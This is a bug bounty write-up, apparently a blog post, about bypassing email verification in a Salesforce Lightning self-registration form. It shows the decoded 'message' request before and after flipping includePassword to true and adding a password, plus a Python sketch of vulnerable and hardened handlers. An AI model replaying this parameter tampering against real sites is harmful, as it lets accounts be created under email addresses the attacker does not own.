Hello friends, this is Prasanth Elangovan (aka Virtuvil), a security researcher and ethical hacker from India.
Note: Sometimes it hits you differently when you know your report is valid, but it is still marked informative :)
Normally, I don't submit high-impact bugs to programmes blindly; instead, I wait for responses to low-impact bugs before reporting high-impact ones. If the programme does not reply, I simply ignore the programme.

I received a private invitation on HackerOne; let's call the target xyz.com. I decided to start testing the site. It's time for the red beast to emerge :)

I did port scanning, searched for directory listing, and tried to find SQLi, but I couldn't find anything. That day I encountered no bugs. The following day, I intended to test for authentication bypass.
Flow of the registration process: When creating an account, we only need to provide our name, email address, and company name. After clicking the sign-up button, the site simply sends a password-setting email. Only after clicking the link in that email can we set the password. This is done for security reasons: as a result, only the owner of the email address can complete the account creation. This is the working flow of the application.

While registering an account, I noticed a parameter called message. The real game begins here!
It's URL-encoded, so I URL-decoded the message parameter. After decoding, it appears as follows:
{
  "actions": [
    {
      "id": "258;a",
      "descriptor": "apex://LightningSelfRegisterController/ACTION$selfRegister",
      "callingDescriptor": "markup://c:selfRegisterCustom",
      "params": {
        "firstname": "Prasanth",
        "lastname": "Elangovan",
        "email": "prasanth@victimdomain.com",
        "password": "",
        "confirmPassword": "",
        "regConfirmUrl": "./CheckPasswordResetEmail",
        "extraFields": "[{\"dbRequired\":false,\"fieldPath\":\"CountryCode\",\"label\":\"Country Code\",\"required\":false,\"type\":\"PICKLIST\",\"value\":\"US\"},{\"dbRequired\":false,\"fieldPath\":\"ACM_Promotional_Updates__c\",\"label\":\"ACM Promotional Updates\",\"required\":false,\"type\":\"Boolean\",\"value\":true}]",
        "startUrl": "",
        "includePassword": false
      }
    }
  ]
}
The Itachi inside of me focused on each parameter. I noticed a variable called includePassword set to false in that message parameter, and the request also contained an empty password value.

It's time to include those passwords and continue my testing. So I entered a random password in both the password and confirmPassword fields, changed the value of includePassword to true, URL-encoded the modified message, and replaced the original message parameter with it before forwarding the request.
The modified decoded request now appears as follows:
{
  "actions": [
    {
      "id": "258;a",
      "descriptor": "apex://LightningSelfRegisterController/ACTION$selfRegister",
      "callingDescriptor": "markup://c:selfRegisterCustom",
      "params": {
        "firstname": "Prasanth",
        "lastname": "Elangovan",
        "email": "prasanth@victimdomain.com",
        "password": "Password@123",
        "confirmPassword": "Password@123",
        "regConfirmUrl": "./CheckPasswordResetEmail",
        "extraFields": "[{\"dbRequired\":false,\"fieldPath\":\"CountryCode\",\"label\":\"Country Code\",\"required\":false,\"type\":\"PICKLIST\",\"value\":\"US\"},{\"dbRequired\":false,\"fieldPath\":\"ACM_Promotional_Updates__c\",\"label\":\"ACM Promotional Updates\",\"required\":false,\"type\":\"Boolean\",\"value\":true}]",
        "startUrl": "",
        "includePassword": true
      }
    }
  ]
}
I now got a 200 OK response. The account was created successfully without any user interaction, and I had complete control of the account.
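To make the defensive lesson concrete, here is an added Python sketch that is not part of the original write-up and not Salesforce's code. It builds a constructed copy of the Lightning action envelope with the field names shown above (placeholder names and addresses), decodes the URL-encoded message parameter the way the write-up does, lists the request fields that control server policy rather than carry user data, and then contrasts two hypothetical server handlers: one that trusts the client's includePassword flag (the behaviour observed) and one that keeps the policy server-side, so the emailed link stays the only way to set a password and a request carrying password material is flagged for monitoring.

```python
import json
from urllib.parse import quote, unquote

# Constructed sample, not a real capture: the decoded JSON that the Lightning
# self-registration form sends URL-encoded in its "message" parameter. Field
# names follow the request in the write-up; the values are placeholders.
SAMPLE_ACTION = {
    "actions": [{
        "id": "258;a",
        "descriptor": "apex://LightningSelfRegisterController/ACTION$selfRegister",
        "callingDescriptor": "markup://c:selfRegisterCustom",
        "params": {
            "firstname": "Alice",
            "lastname": "Example",
            "email": "alice@example.invalid",
            "password": "",
            "confirmPassword": "",
            "regConfirmUrl": "./CheckPasswordResetEmail",
            # extraFields is a JSON document embedded as a string inside the JSON
            "extraFields": json.dumps([
                {"fieldPath": "CountryCode", "type": "PICKLIST", "value": "US"}
            ]),
            "startUrl": "",
            "includePassword": False,
        },
    }]
}
# What the browser actually puts on the wire: the form field value, URL-encoded.
SAMPLE_MESSAGE = quote(json.dumps(SAMPLE_ACTION), safe="")


def decode_message(encoded: str) -> dict:
    """URL-decode the message parameter and parse the Aura action envelope."""
    return json.loads(unquote(encoded))


def self_register_params(message: dict) -> dict:
    """Return the params of the selfRegister action, with extraFields parsed."""
    for action in message.get("actions", []):
        if action.get("descriptor", "").endswith("ACTION$selfRegister"):
            params = dict(action["params"])
            params["extraFields"] = json.loads(params.get("extraFields") or "[]")
            return params
    raise ValueError("no selfRegister action in message")


def client_controlled_policy_flags(params: dict) -> list:
    """Review helper: name request fields that decide server behaviour rather
    than carry user data. A policy decision must not be readable from the client."""
    findings = []
    if "includePassword" in params:
        findings.append("includePassword is supplied by the client")
    if params.get("password") or params.get("confirmPassword"):
        findings.append("password material present in a self-registration request")
    return findings


def vulnerable_self_register(params: dict) -> dict:
    """Hypothetical model of the behaviour the write-up observed: the server
    honours the client's includePassword flag and activates the account with
    the supplied password, so the emailed password-setting link is never needed."""
    account = {"email": params["email"], "password_set": False, "verified": False}
    if params.get("includePassword") and params.get("password"):
        if params["password"] != params.get("confirmPassword"):
            raise ValueError("passwords do not match")
        account["password_set"] = True
        account["verified"] = True   # no proof of mailbox ownership at all
    return account


# Server-side policy: a deployment setting, never read from the request.
REQUIRE_EMAIL_PASSWORD_SETUP = True


def hardened_self_register(params: dict) -> dict:
    """Hypothetical corrected handler: the client's flag is ignored, password
    material in the request is discarded and flagged for monitoring, and the
    only way to set a password is the one-time link mailed to the address."""
    tampered = REQUIRE_EMAIL_PASSWORD_SETUP and bool(
        params.get("includePassword") or params.get("password")
        or params.get("confirmPassword"))
    account = {
        "email": params["email"],
        "password_set": False,
        "verified": False,
        "setup_email_queued": REQUIRE_EMAIL_PASSWORD_SETUP,
        "tamper_alert": tampered,   # worth alerting on: the form never sends these
    }
    if not REQUIRE_EMAIL_PASSWORD_SETUP and params.get("password"):
        # Only a deployment that deliberately allows passwords at sign-up gets here.
        account["password_set"] = params["password"] == params.get("confirmPassword")
    return account
```

The design point is that includePassword is a policy switch, and a policy switch travelling in the request body is only ever a hint; the hardened handler reads the real switch from server configuration and treats a client that tries to flip it as a signal worth logging.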
I became incredibly excited and submitted the full report, with all the details, to HackerOne. I had great expectations for this one. :)
I received a response after five days. Yeah, the bug was marked as informative. To me, that was shocking.

It's not even a duplicate. It's informative. :)

As I said earlier, it may hit you differently when you know your report is valid, but it is still marked informative :)
I have a few other high-impact reports that were also closed as informative. But that's okay. Learning is also important.
Thank you for reading this far. Please DM me if you have any questions.
Contact: LinkedIn